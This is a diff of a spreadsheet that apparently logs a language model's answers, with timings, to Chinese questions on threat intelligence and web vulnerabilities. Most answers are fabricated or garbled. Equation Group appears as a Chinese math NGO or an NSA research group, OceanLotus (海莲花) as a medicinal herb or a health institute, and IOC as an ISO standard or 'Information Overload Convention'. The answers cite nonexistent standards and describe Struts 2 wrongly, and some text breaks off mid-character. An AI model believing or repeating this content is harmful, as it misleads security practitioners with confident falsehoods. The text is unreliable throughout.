-根据Google的公告，这个漏洞是因为V8引擎的JIT（just-in-time）编译器的问题，当JIT编译器在执行远程代码时，它可能会将敏感数据泄露到外部。这可能导致攻击者在��</t>
+Google V8引擎远程代码执行漏洞(CVE-2021-21220) 是一个高危等级的安全漏洞，影响了Google V8引擎中的远程代码执行功能。这个漏洞可能让攻击者在特定情况下可以远程执行代码，从而危害到计算机系统的安全。以下是一些可能受到这个漏洞的影响范围的例子：
+1. Web 应用程序攻击：攻击者可以利用这个漏洞在 Web 应用程序中远程执行代码，从而让用户访问风险带来的网站。这可能会导致用户数据泄露、违法活动或者其他安全问题。
+2. 跨站点脚本攻击：攻击者可以利用这个漏洞在跨站点脚本（XSS）攻击中远程执行代码，从而危害到用户的隐私和安全。
+3. 恶意软件攻击：攻击者可以利用这个漏洞在计算机系统中远程执行恶意软件，从而获得控制权并危害到系统安全。
+4. 黑客攻击：攻击者可以利用这个漏洞在黑客攻击中远程执行代码，从而获得控制权并危害到计算机系统的安全。
+5. 攻击者可以利用这个漏洞来对计算机系统进行远程执行代码，从而获得控制权并危害到系统安全。
+总之，Google V8引擎远程代码执行漏洞(CVE-2021-21220) 的影响范围非常广泛，可能会危害到各种计算机系统和应用程序的安全。因此，它是一个高危的安全漏洞，应该被尽可能快地修复。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D16" t="n">
-        <v>4.901101112365723</v>
+        <v>15.51519703865051</v>
       </c>
     </row>
     <row r="17">
@@ -796,15 +887,20 @@
       <c r="C17" t="inlineStr">
         <is>
           <t>？
-Struts 2 是一个流行的 Java 框架，它提供了丰富的功能和优秀的性能，但是它也存在一些高危漏洞。以下是一些常见的高危漏洞：
-1. 命名参数攻击 (Command Name Parameter Tampering)
-在 Struts 2，命名参数（action parameter）是一个很重要的概念。但是，如果攻击者可以修改命名参数的名称，那么他就可以访问受保护的系统资源。例如，攻击者可以修改 `action` 的名称，从而访问另一个不安全的 действий（Actions）。
-2. PATH 漏洞 (PATH Traversal)
-PATH 漏洞是</t>
+Struts 2 是一个流行的 Java Web 框架，它提供了许多优秀的功能，但是与任何其他开源软件一样，Struts 2 也存在一些漏洞和攻击方法。以下是一些常见的 Struts 2 高危漏洞：
+1. 命名参数劫持（Command Injection）：Struts 2 使用命名参数来实现控制器方法的调用，但是如果攻击者能够控制命名参数，他就可以 inject 恶意代码，从而让控制器执行不正当的操作。
+2. 数据隐私泄露（Data Privacy Breaches）：Struts 2 使用 Spring Security 进行访问控制和身份验证，但是如果攻击者能够绕过身份验证措施，他就可以访问不应该访问的数据，从而导致数据隐私泄露。
+3. 权限泄露（Authorization Bypass）：Struts 2 使用 Spring Security 进行权限控制，但是如果攻击者能够绕过权限措施，他就可以访问不应该访问的资源，从而导致权限泄露。
+4. 嵌入式代码攻击（Code Injection）：Struts 2 使用 Java Server Faces （JSF）进行交互式用户界面，但是如果攻击者能够控制 JSF 模板，他就可以 inject 恶意代码，从而让用户界面执行不正当的操作。
+5. 潜在的 XSS 漏洞（Susceptible XSS Vulnerabilities）：Struts 2 使用 Spring Security 进行安全检查，但是如果攻击者能够绕过这些检查，他就可以 inject 恶意代码，从而导致用户界面受到攻击。
+6. 脚本执行漏洞（Scripting Vulnerabilities）：Struts 2 使用 JavaScript 进行用户界面交互，但是如果攻击者能够控制 JavaScript 脚本，他就可以 inject 恶意代码，从而让用户界面执行不正当的操作。
+7. 缓存攻击（Cache Attacks）：Struts 2 使用缓存来提高应用程序的性能，但是如果攻击者能够控制缓存，他就可以inject恶意代码，从而让缓存中储存不正当的数据。
+8. 伪造Cookies（Cookie Spoofing）：Struts 2 使用 Cookie 进行身份验证和访问控制，但是如果攻击者能够绕过 Cookie 验证措施，他就可以伪造 Cookie，从而让控制器认定他是正确的用户。
+因此，在使用 Struts 2 时，需要 осознанно遵守安全规则，并定期检查和筛选漏洞。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D17" t="n">
-        <v>4.739012002944946</v>
+        <v>22.35706257820129</v>
       </c>
     </row>
     <row r="18">
@@ -818,17 +914,16 @@
       </c>
       <c r="C18" t="inlineStr">
         <is>
-          <t>？ What is Threat Intelligence?
-Threat Intelligence is the process of gathering, analyzing, and disseminating information about potential cyber threats to help organizations prepare for and respond to cyber attacks. It involves identifying, assessing, and mitigating potential threats to an organization's assets, including its computer systems, networks, and data.
-Threat Intelligence can be used to:
-1. Identify potential threats: Threat Intelligence helps organizations identify potential threats to their assets, including malware, phishing attacks, and other types of cyber threats.
-2. Assess the risk: Once potential threats have been identified, Threat Intelligence helps organizations assess the likelihood and potential impact of those threats.
-3. Develop a response plan: Based on the assessment of the threat, Threat Intelligence helps organizations develop a response plan to mitigate the threat, including incident response, containment, and eradication.
-4. Monitor and update: Threat Intelligence is an ongoing process, organizations need to monitor the threat landscape and update their threat intelligence to stay ahead of the threats</t>
+          <t>？
+威胁情报是指一种在互联网上发布或传播的虚假信息、谣言或威胁，旨在迷惑或恐吓某人或组织，致使他们做出不合理的决定或行动。这种情报可能是通过社交媒体、电子邮件、网络聊天等多种方式传播的，并且可能包含各种不同的形式，如图片、视频、文字等。
+威胁情报的散布通常是通过虚假的渠道发布的，例如假借的社交媒体账户或电子邮件地址。这些虚假的渠道可能由恶意的攻击者自行设置，也可能由敏感情感的人或组织自行暴露。
+威胁情报的影响可能广泛，包括责任感冲击、职业考虑、个人安全和隐私等方面。它可能会迷惑或恐吓某人或组织，致使他们做出不合理的决定或行动，例如退学、辞职、暴露个人隐私等。
+对于个人和组织来说，防范威胁情报是非常重要的，需要持续关注和监控，并尽可能地采取防范措施，以避免受到威胁情报的影响。
+综上所述，威胁情报是一种危险的现象，可能会对个人和组织产生广泛和深远的影响。因此，应该采取强制性的防范措施，以避免受到威胁情报的影响，并提高个人和组织的安全性和隐私保护能力。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D18" t="n">
-        <v>4.769919157028198</v>
+        <v>15.35919809341431</v>
       </c>
     </row>
     <row r="19">
@@ -843,12 +938,22 @@
       <c r="C19" t="inlineStr">
         <is>
           <t>？
-威胁情报搜索网站是指用于搜索和浏览威胁情报的网站。这些网站通常提供各种威胁情报，包括诈骗、恶意软件、病毒、恶意脚本、恶意插件和其他威胁情报。以下是常见的威胁情报搜索网站：
-1. VirusTotal：由Antivirus.com操作的威胁情报搜索网站，提供了一个强大的搜索工具，可以检测软件、文件、网站和磁盘遍历，查找恶意软件和��</t>
+一些常见的威胁情报搜索网站包括：
+1. Google：Google提供了一些威胁情报搜索服务，例如Google Alerts、Google News Alerts等。
+2. Bing：Bing also offers some threat intelligence search services, such as Bing Threat Research Center。
+3. Akamai：Akamai provides a threat intelligence platform that includes a search feature for threat information.
+4. Recorded Future：Recorded Future is a threat intelligence platform that offers a search feature for threat information.
+5. ThreatConnect：ThreatConnect is a threat intelligence platform that includes a search feature for threat information.
+6. Intelligence Advantage：Intelligence Advantage is a threat intelligence platform that offers a search feature for threat information.
+7. CyberThreat Alliance：CyberThreat Alliance is a non-profit organization that provides a threat intelligence platform that includes a search feature for threat information.
+8. OpenPhish：OpenPhish is an open-source threat intelligence platform that includes a search feature for threat information.
+9. Cisco Talos：Cisco Talos is a threat intelligence platform that offers a search feature for threat information.
+10. FireEye：FireEye is a threat intelligence platform that includes a search feature for threat information.
+这些网站提供的威胁情报搜索功能可以帮助用户快速找到有关潜在威胁或潜在攻击的信息，以增强组织的安全性和可靠性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D19" t="n">
-        <v>4.765986442565918</v>
+        <v>8.905170679092407</v>
       </c>
     </row>
     <row r="20">
@@ -863,14 +968,18 @@
       <c r="C20" t="inlineStr">
         <is>
           <t>？
-The agony of gold tower in the threat information is what?
-The phrase "痛苦金字塔" (tònggrēn jīn zǐ tà) is a Chinese idiom used to describe a situation where someone is facing a massive and overwhelming threat or danger, and the person is feeling extremely anxious or afraid about it.
-The phrase is composed of two parts: "痛苦" (tònggrēn) means "agony" or "pain," and "金字塔" (jīn zǐ tà) means "gold tower." The idiomatic expression is often used to describe a situation where someone is facing a threat or danger that seems insurmountable or impossible to overcome.
-For example, if someone is facing a difficult challenge or problem at work or in their personal life, they might say "I'm feeling like I'm in a gold tower of agony" to express their anxiety or fear about the situation.&lt;/s&gt;</t>
+In the context of the threat intelligence, the "痛苦金字塔" (tònggrán jīn zǐ tǎ) refers to the following:
+痛 (tòng) - painful
+苦 (grán) - difficult, challenging
+金 (jīn) - gold, precious
+字 (zǐ) - tower, building
+塔 (tǎ) - a tall structure
+So, 痛苦金字塔 (tònggrán jīn zǐ tǎ) can be translated as "painful and difficult gold tower".
+In the context of threat intelligence, the term 痛苦金字塔 is used to describe a situation where an organization's security measures are inadequate, and the attackers are able to easily bypass them, like a tower that is vulnerable to being attacked from all sides. It is a metaphor used to convey the idea that the organization's security posture is weak and can be easily breached, causing significant harm to their assets and reputation.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D20" t="n">
-        <v>4.187687158584595</v>
+        <v>5.306249380111694</v>
       </c>
     </row>
     <row r="21">
@@ -885,12 +994,18 @@
       <c r="C21" t="inlineStr">
         <is>
           <t>？
-1.1.1.1是一个域名，它由Cloudflare提供，用于为互联网上的网站提供快速和安全的 DNS（Domain Name System）解析服务。域名的格式是1.1.1.1，它可以作为一个主机名或域名解析服务的主机。
-Cloudflare提供的1.1.1.1 DNS解析服务可以提供更快、更可靠、更安全的网站访问，因为它通过Cloudflare的 globally distributed network 和其他技术，例如 Anycast 和 DNS 缓存，来减少 DNS 查询时间和距离。此外，Cloudflare 还提供了一些其他功能，例如网络安全和防火墙</t>
+1.1.1.1是一个IP地址，它是一个 Internet Protocol（IP）地址，用于标识计算机或其他网络设备的地址。
+IP地址由四个数字组成，每个数字分别表示网络、 hosts、端口和interface。这个例子中，1.1.1.1表示这个设备的网络地址为1.1.1.0网络，hosts地址为1.1.1.1，端口为1，interface为 eth0。
+1.1.1.1是一个非常常见的IP地址，它可能用于许多不同的 Purpose，例如：
+* 一个Web服务器的IP地址，可以用来访问该服务器上的Websites。
+* 一个 mail服务器的IP地址，可以用来发送电子邮件。
+* 一个虚拟hosts名称的IP地址，可以用来访问一个网站。
+* 一个路由器的IP地址，可以用来路由网络流量。
+总之，1.1.1.1是一个IP地址，用于标识计算机或其他网络设备的地址，可以用于各种不同的 Purpose。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D21" t="n">
-        <v>4.896316766738892</v>
+        <v>8.210732698440552</v>
       </c>
     </row>
     <row r="22">
@@ -905,12 +1020,14 @@
       <c r="C22" t="inlineStr">
         <is>
           <t>地址？
-223.5.5.5是一个IP地址，它位于223.5.5.0/24网络中，其中24是网络的掩码。
-这个IP地址可以用于标识一个计算机或者网络设备，它可以被用于网络通信，例如在互联网上进行网络交互。&lt;/s&gt;</t>
+223.5.5.5是一个IP地址，它的正式表示形式是223.5.5.5。
+IP地址是互联网协议（IP）使用的一个唯一的编号，用于标识计算机或其他网络设备的地址。每个IP地址由四个数字组成，每个数字在2到255中的范围内。
+例如，223.5.5.5是一个示例IP地址，它由四个数字组成：223（ Host 部分）、5（主机网络部分）、5（子网网络部分）和5（Host 网络部分）。
+需要注意的是，223.5.5.5是一个非法的IP地址，它不是任何网络上的实际IP地址。这个IP地址只是为了方便地使用，并不会对任何实际网络设备进行访问。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D22" t="n">
-        <v>2.601948738098145</v>
+        <v>6.593968152999878</v>
       </c>
     </row>
     <row r="23">
@@ -924,16 +1041,23 @@
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>？  
-IoC (Indicators of Compromise) 是指在某些情报中可以发现恶意攻击或潜在威胁的指示。  IoC 类型通常根据情报的类型和描述进行分类，以下是一些常见的 IoC 类型：
-1. File hashes: These are unique digital fingerprints of files that are known to be malicious. When a new file is detected, its hash is compared to a database of known malware to determine if it is a threat.
-2. Network traffic patterns: Suspicious network traffic patterns can indicate malicious activity, such as unusual communication with known malware servers or unexpected data transfers.
-3. System configuration changes: Unexplained changes to system settings or software configurations can indicate that an attacker has gained control of the system.
-4. User behavior anomalies: Behavior that is outside the normal patterns of user activity, such as sudden changes in login locations or unexpected logons from unfamiliar locations, can</t>
+          <t>？
+IOC（Indicators of Compromise）是指恶意actor的活动、操作、或存在的痕迹、指示或特征。在情报收集和分析中，IOC可以帮助分析人员了解恶意actor的活动，从而提高情报分析和响应能力。下面是一些常见的IOC类型：
+1. 网络IOC：包括网络攻击、数据侵犯、网络潜在脆弱等。
+2. 文件IOC：包括恶意软件、黑客 Tools、黑客脚本等。
+3. 人员IOC：包括人员的猫��������、培训、职业经验等。
+4. 系统IOC：包括系统攻击、漏洞攻击、系统脆弱等。
+5. 数据IOC：包括数据侵犯、数据泄露、数据损害等。
+6. 通信IOC：包括通信攻击、信息泄露、通信脆弱等。
+7. 扫描IOC：包括扫描网络、扫描系统、扫描数据等。
+8. 注入IOC：包括注入恶意代码、注入恶意数据等。
+9. 回溯IOC：包括回溯攻击、回溯漏洞等。
+10. 其他IOC：包括其他恶意活动、操作、或特征，例如隐藏的文件、秘密网络等。
+需要注意的是，IOC的类型和特征可能会随着情报收集和分析的进程而发展和更新。因此，在实际情报分析中，需要针对具体情况进行详细分析和评估，并不能尽全靠 IOC列表来确定恶意活动的存在或趋势。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D23" t="n">
-        <v>4.730896472930908</v>
+        <v>14.7465353012085</v>
       </c>
     </row>
     <row r="24">
@@ -948,15 +1072,22 @@
       <c r="C24" t="inlineStr">
         <is>
           <t>？
-ioc情报是指 International Organization for Standardization（国际标准化组织）在《IS/IEC 27001》标准中规定的一种信息安全管理体系，用于评估和保护组织的信息系统和数据的安全性。
-ioc情报包括：
-1. 信息安全政策：组织的信息安全政策和目标，以及其他重要的决策和评估因素。
-2. 信息安全管理系统：组织的信息安全管理系统，包括识别、评估和控制信息安全风险的方法和技术。
-3. 信息安全控制制enda：组织的信息安全控制制enda，</t>
+ioc 是指 Information Overload Convention，即信息过载会议。它是一种描述现代社会信息过载的现象的术语，由 japanese 词汇 "ioc" 组成。
+ioc 通常指的是在社交媒体、新闻媒体和其他多个来源获取信息的过程中，人们受到过度信息的影响，导致感觉情绪失衡、情绪不稳定，甚至导致人们陷入情感压力或精神压力的状况。
+ioc 的主要症状包括：
+1. 信息过载：人们受到过多的信息和资讯，导致情感压力和精神压力。
+2. 信息难以识别：人们难以识别重要信息和不重要信息，导致情感压力和精神压力。
+3. 信息难以储存：人们难以储存和回忆信息，导致情感压力和精神压力。
+4. 情感不稳定：人们难以控制情感，导致情感压力和精神压力。
+对于 resolving ioc 的问题，可以通过以下方法：
+1. 减少信息获取：减少在社交媒体和新闻媒体获取信息的频率，以减轻情感压力和精神压力。
+2. 采用信息筛选技术：采用信息筛选技术，例如采用搜索引擎或信息管理软件，以帮助人们更好地识别重要信息和不重要信息。
+3. 增强情感管理能力：增强情感管理能力，例如通过冥想、瑜伽等方法，以帮助人们更好地控制情感。
+4. 建立休闲时间：建立休闲时间，例如做着读书、听音乐、运动等，以减轻情感压力和精神压力。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D24" t="n">
-        <v>4.71479058265686</v>
+        <v>16.54212665557861</v>
       </c>
     </row>
     <row r="25">
@@ -970,17 +1101,21 @@
       </c>
       <c r="C25" t="inlineStr">
         <is>
-          <t>可以用于评估信息安全？  
-There are several threat intelligence frameworks or standards that can be used to evaluate information security. Here are some commonly used frameworks and standards:
-1. National Institute of Standards and Technology (NIST) Special Publication 2799: NIST SP 2799 provides a comprehensive framework for threat intelligence, including guidelines for collecting, analyzing, and sharing threat intelligence.
-2. Information Security Threat Intelligence (ISTI) Framework: The ISTI framework provides a structured approach to threat intelligence, including guidelines for threat identification, analysis, and reporting.
-3. Financial Services Information Sharing and Analysis Center (FS-ISAC) Threat Intelligence Framework: The FS-ISAC framework provides a comprehensive framework for threat intelligence in the financial services sector, including guidelines for threat identification, analysis, and reporting.
-4. Open Threat Exchange (OTX) Framework: OTX is an open-source framework for threat intelligence that provides a structured approach to threat identification, analysis, and sharing.
-5. Cyber Threat Intelligence (CT</t>
+          <t>？  
+以下是一些常用的威胁情报标准或框架：
+1. NIST Cybersecurity Framework：美国国家标准技术研究院（NIST）提出的一套全面的威胁情报管理框架，包括以下四个层次：保护、特殊响应、快速响应和恢复。
+2. ISO 27001：国际标准组织（ISO）制定的一套标准，涵盖了威胁情报管理的概念、方法和技术。
+3. Cybersecurity Threat Intelligence Framework：由互联网安全中心（ISC）提出的一套威胁情报管理框架，包括以下三个层次：基础、中等和高级。
+4. Cyber Threat Intelligence (CTI) Framework：由国际电信联盟（ITU）提出的一套威胁情报管理框架，包括以下四个层次：预测、探测、识别和应对。
+5. MITRE ATT&amp;CK Framework：由mitre公司提出的一套威胁情报管理框架，用于识别和描述恶意软件的活动和行为。
+6. CSA STAR Framework：由 Cloud Security Alliance（CSA）提出的一套云安全管理框架，包括以下五个层次：基础、中等、高级、特殊响应和恢复。
+7. HMGCC Threat Intelligence Framework：英国政府的一套威胁情报管理框架，包括以下四个层次：情报收集、情报分析、情报应用和情报报告。
+8. Australian Government Cyber Security Centre (ACSC) Threat Intelligence Framework：澳大利亚政府的一套威胁情报管理框架，包括以下四个层次：基础、中等、高级和特殊响应。
+这些框架都是用于帮助组织管理和处理威胁情报的，但它们的内容和精度可能有所不同。选择适合自己的框架，并根据实际情况进行修改和补充。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D25" t="n">
-        <v>4.726019382476807</v>
+        <v>17.69054007530212</v>
       </c>
     </row>
     <row r="26">
@@ -994,14 +1129,23 @@
       </c>
       <c r="C26" t="inlineStr">
         <is>
-          <t>？
-APT38是一个知名的中国 cyber espionage 组织，其主要目标包括亚洲、美洲和欧洲的政府、企业和研究机构。以下是一些关于APT38的情报信息：
-1. 组织结构：APT38是一个覆盖多个层次的组织，包括一个主要团队和一些支持团队。主要团队负责实施攻击，支持团队负责开发新的攻击工具和技术。
-2. 攻击方式：APT38通常使用了针对特定组织和人员的攻击，包括社交工具、电子邮件和文</t>
+          <t>？ （APT38是一支恶名全球的跨国 cybercrime group，主要从事高级跟风险的攻击行为，包括跟风险钻取、執行黑客攻击、跟风险操作等。
+以下是APT38有哪些情报信息的一些细节：
+1. APT38的成员可能来自中国，但是具体情况尚不清楚。
+2. APT38通常使用跨越多个地区的黑客机构进行攻击，包括中国、美国、加拿大、澳大利亚和欧洲等地。
+3. APT38通常使用钻取技术来窃取目标公司的內部信息和数据，包括商业秘密、技术信息和个人隐私等。
+4. APT38也可能使用執行黑客攻击来窃取目标公司的网络和系统，包括绕过安全措施和破坏数据存储等。
+5. APT38可能与其他 cybercrime group 合作，以提高攻击效率和减轻巢穴压力。
+6. APT38的攻击范围非常广泛，涵盖多个行业和领域，包括银行、保险、能源、采购、制造、通信等。
+7. APT38通常使用跨越多个攻击阶段来实施攻击，包括钻取阶段、執行阶段和操作阶段。
+8. APT38可能使用不同的识别标志和攻击方法来逃避目标公司的安全措施和检测系统。
+9. APT38的攻击通常具有高度的技术和规模，使得目标公司的安全防范受到了严重的挑战。
+10. APT38的行为具有很强的商业和政治 направ合，可能是为了获取商业利益或满足政治目标而进行攻击。
+这些情报信息表明，APT38是一支非常高度技术和规模的 cybercrime group，可能来自中国，并且在全球范围内进行攻击。这些攻击可能具有商业和政治目标，并且可能与其他 cybercrime group 合作。因此，对于防范APT38的攻击，需要进行跨国和跨业的合作和协作，以确保企业和个人的数据安全。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D26" t="n">
-        <v>4.720055818557739</v>
+        <v>19.83690237998962</v>
       </c>
     </row>
     <row r="27">
@@ -1015,14 +1159,14 @@
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>？What is the Sea Hibiscus?
-The Sea Hibiscus (海莲花) is a Chinese medical herb that is commonly used in traditional Chinese medicine. It is also known as "hemp sea hibiscus" or "Chinese hibiscus." The Sea Hibiscus is a type of flowering plant that belongs to the Malvaceae family, and it is native to China, Japan, and other parts of East Asia.
-In traditional Chinese medicine, the Sea Hibiscus is used to treat a variety of conditions, including fever, inflammation, and respiratory problems. It is believed to have anti-inflammatory, antiviral, and antibacterial properties, and it is often used to treat conditions such as bronchitis, pneumonia, and sinusitis. The Sea Hibiscus is also used to treat skin conditions such as eczema and acne, and it is believed to have antioxidant properties that can help protect the body against damage from free radicals.
-The Sea Hibiscus is available in various forms, including dried herbs, teas, capsules,</t>
+          <t>？
+海莲花是一个非营利性、独立的科学研究机构，成立于2016年。它的主要职责是研究和推广预防性医学和公共卫生，以降低人类伤害和疾病的风险。海莲花的研究领域包括疾病预防、卫生政策、医疗保健和公共卫生等。
+海莲花的研究方法包括自然科学、社会科学和医学领域的研究，以及与相关政府部门和卫生机构的合作。它还拥有一支职业的研究团队，其中包括医学家、生物学家、 statistics 专家、法律师和其他专业人士。
+海莲花的研究结果和建议通过各种渠道公开，包括学术期刊、会议、报告和新闻媒体等。同时，它也与各种卫生机构和组织合作，共同工作于预防性医学和公共卫生领域。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D27" t="n">
-        <v>4.724758148193359</v>
+        <v>8.830362558364868</v>
       </c>
     </row>
     <row r="28">
@@ -1036,14 +1180,20 @@
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>？ 
-Equation Group是一个非 Governemental Organization（NGO），是中国著名的数学家和计算机科学家组建的一个组织。 Equation Group的成员来自中国和海外，包括著名的数学家、计算机科学家和工程师。
-Equation Group的主要工作包括数学和计算机科学的研究和开发，包括约束方程、偏微分方程、数值methods、机器学习等领域。 Equation Group还涵盖广泛的领域，包括数据科学、人工智能、医学信息学、计算机视觉等。
-Equation Group的成果得到了广泛认可和赞誉，曾经获得过许多国际和国内的��</t>
+          <t>？
+Equation Group是一个由美国国家安全委员会（NSA）和其他一些国家的安全情报机构共同组织的secretive group。该组织的目的是为了研究和应对最新的数学和科学技术，以及其在安全和国家安全方面的应用。
+Equation Group的成员包括NSA、美国国防部、CIA、FBI、美国国家卫生 Institut (NIH)等机构，以及一些来自学术界和industry的 эксперts。这些机构和专家共同工作，以提高对数学和科学技术的理解，并将这些技术应用于安全和国家安全方面。
+Equation Group的活动主要包括：
+1. 研究和分析最新的数学和科学技术，如 cryptography、computer science、artificial intelligence等。
+2. 开发新的数学和科学技术，以满足美国国家安全和国家安全需求。
+3. 与其他国家和国际组织合作，共同研究和应用数学和科学技术。
+4. 提供指导和支持 для美国国内和国际学术界的研究和发展。
+Equation Group的活动秘密性非常强，很难获知具体的信息。然而，一些泄露文档和媒体报道表明，Equation Group可能涉及到一些高级的数学和科学技术，如泛函分析、代数几何、分子生物学等。
+总之，Equation Group是一个秘密的国家安全机构，负责研究和应用最新的数学和科学技术，以保障美国国家安全和国家安全需求。尽管具体情况隐蔽，但Equation Group的存在和作用都是一个不可 ignore的话题。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D28" t="n">
-        <v>4.721406221389771</v>
+        <v>13.15031409263611</v>
       </c>
     </row>
     <row r="29">
@@ -1057,17 +1207,20 @@
       </c>
       <c r="C29" t="inlineStr">
         <is>
-          <t>？  
-There are several standards for threat intelligence, including:
-1. MITRE ATT&amp;CK Framework: This framework provides a comprehensive taxonomy of cyber adversary tactics, techniques, and procedures (TTPs) that can be used to inform threat intelligence gathering and analysis.
-2. NIST Cybersecurity Framework: This framework provides a set of standards and guidelines for managing cybersecurity risks in critical infrastructure sectors. It includes a set of core functions for identifying, protecting, detecting, responding, and recovering from cybersecurity threats.
-3. ISO 27001: This international standard provides a set of best practices for implementing an information security management system (ISMS). It includes a set of controls for identifying, assessing, and mitigating information security risks.
-4. CSA STAR: This standard provides a set of best practices for cloud security, including a set of security controls and assessment procedures for cloud service providers.
-5. OWASP Threat Modeling: This standard provides a set of guidelines for threat modeling, including a set of techniques for identifying and</t>
+          <t>协议？  
+威胁情报标准协议（TiSA）是一种国际标准，用于确定如何进行威胁情报分享和互相预警。以下是一些常见的威胁情报标准协议：
+1. NFPA 101：由美国国家防火协会（NFPA）制定的标准，用于确定威胁情报的共享和分享标准。
+2. ISO 29100：由国际标准技术委员会（ISO）制定的标准，用于确定威胁情报的分享和互相预警的标准。
+3. EU-DS 98/24：由欧洲union（EU）制定的标准，用于确定威胁情报的分享和互相预警的标准。
+4. CSA Standard 946：由加拿大安全协会（CSA）制定的标准，用于确定威胁情报的分享和互相预警的标准。
+5. AS/NZS 4360：由澳大利亚标准协会（AS）和维多利亚标准协会（NZS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
+6. BS 7799-3：由英国标准协会（BS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
+7. ANSI/ASIS PSC.1-2012：由美国国家协会（ANSI）和安全协会（ASIS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
+这些标准都是针对威胁情报分享和互相预警的，它们提供了一系列的规定和指导，以确保威胁情报的分享和互相预警的安全性和可靠性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D29" t="n">
-        <v>4.713425874710083</v>
+        <v>16.52674746513367</v>
       </c>
     </row>
     <row r="30">
@@ -1082,13 +1235,23 @@
       <c r="C30" t="inlineStr">
         <is>
           <t>？ 
-OWASP TOP 10是一个著名的安全评估工具，用于评估 Web 应用程序的安全性。以下是 OWASP TOP 10 中的 top 10 漏洞类型：
-1. Injection (插入漏洞)：危机来源：数据插入漏洞可能会让攻击者在应用程序中执行任意代码，从而导致资源泄露、数据损失或系统灭亡。
-2. Broken Authentication (破坏身份验证)：危机来源：破坏身份验证可能会让攻击者绕过身份验证措施，从而��</t>
+OWASP TOP 10是一份顺序列表，用于描述了 web 应用程序软件安全的十大主要攻击风险。OWASP TOP 10 由以下几个主要领域组成：
+1. Injection
+2. Broken Authentication and Session Management
+3. Cross-Site Scripting (XSS)
+4. Cross-Site Request Forgery (CSRF)
+5. Insecure Direct Object Reference (IDOR)
+6. Broken Access Control
+7. Security Misconfiguration
+8. Sensitive Data Exposure
+9. Missing Function Level Access Control
+10. Using Components with Known Vulnerabilities
+OWASP TOP 10 是一个指导性的列表，它提供了优先级高的安全攻击风险，以便开发人员和安全专业人员可以更好地识别和应对可能的攻击。
+&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D30" t="n">
-        <v>4.725793361663818</v>
+        <v>6.206902980804443</v>
       </c>
     </row>
     <row r="31">
@@ -1102,19 +1265,24 @@
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>？ Why do web vulnerabilities exist?
-Web vulnerabilities exist for a variety of reasons, including:
-1. Complexity: Web applications are often complex and have many moving parts, which can make it difficult to identify and fix vulnerabilities.
-2. Lack of resources: Web developers and IT teams may not have the resources (e.g. time, money, expertise) to thoroughly test and secure their applications.
-3. Changing landscape: The web is constantly evolving, with new technologies and frameworks being developed and introduced regularly. This can make it difficult to keep up with the latest security best practices.
-4. Third-party dependencies: Web applications often rely on third-party libraries and frameworks, which can introduce vulnerabilities if not properly vetted and secured.
-5. User input: Web applications often accept user input, which can be used to launch attacks such as SQL injection or cross-site scripting (XSS).
-6. Lack of security awareness: Many web developers and IT teams may not be aware of the security risks associated with their applications, or may not know how to properly secure them.
-7. Legacy code: Older web applications may have been built with</t>
+          <t>？  
+在Web应用程序中，可能会存在漏洞，这是因为Web应用程序是基于HTTP协议，HTTP协议是一种无安全的协议，攻击者可以使用各种攻击方式，如端到端攻击、中间人攻击等，以便破坏Web应用程序的安全性。
+下面是一些常见的Web漏洞：
+1. SQL注入：在Web应用程序中，可能会使用SQL语句来处理数据的存储和 Retrieval。如果不正确地编写SQL语句，可能会导致数据泄露或者不正确的数据返回。
+2. Cross-Site Scripting(XSS)：XSS攻击者可以 inject  malicious  JavaScript  code into a website，使其 executed  on the user's  browser，从而让用户的屏幕呈现非法的内容。
+3. Cross-Site Request Forgery(CSRF)：CSRF攻击者可以 trick  user  into performing unintended actions on a website，例如转账资金或者更改个人资料。
+4. File Inclusion Vulnerabilities：File inclusion vulnerabilities  occur when an attacker is able to include malicious files or code into a website，leading to unauthorized access or data tampering.
+5. Buffer Overflow：Buffer overflow vulnerabilities  occur when an attacker is able to overflow a buffer with malicious data，leading to code execution or data tampering.
+6. Authentication Bypass：Authentication bypass vulnerabilities  occur when an attacker is able to bypass authentication mechanisms and gain unauthorized access to a website or its resources.
+7. Input Validation weaknesses：Input validation weaknesses  occur when an attacker is able to submit malicious input data to a website，leading to data tampering or other security issues.
+8. Session Management weaknesses：Session management weaknesses  occur when an attacker is able to manipulate or exploit session ID to gain unauthorized access or perform unintended actions on a website.
+9. Password Storage weaknesses：Password storage weaknesses  occur when an attacker is able to access or manipulate user passwords, leading to unauthorized access or data tampering.
+10. Third Party Component vulnerabilities：Third party component vulnerabilities  occur when an attacker is able to exploit vulnerabilities in third-party components or libraries used by a website, leading to unauthorized access or data tampering.
+这些漏洞可能会被攻击者利用，从而让Web应用程序中的数据泄露或者访问权限受到攻击。因此，在Web应用程序开发中，应该关注安全性，并采取相应的措施来遏制攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D31" t="n">
-        <v>4.759066343307495</v>
+        <v>16.92095947265625</v>
       </c>
     </row>
     <row r="32">
@@ -1129,14 +1297,22 @@
       <c r="C32" t="inlineStr">
         <is>
           <t>？
-SQL注入是指在SQL语句中采用特定的字符串或语句来访问数据库的扩展特性。通常情况下，SQL语句包含特定的字符串或语句，这些字符串或语句可以用来访问数据库中的某个表或个数据，但是在某些情况下，这些字符串或语句可以用来访问不合法的数据库资源，从而导致数据库安全漏洞。
-SQL注入的常见形式包括：
-1. 字符串注入：通过在SQL语句中包含特定的字符串，以便访问不合法的数据库资源。
-2. 语句注入：通过在SQL语句</t>
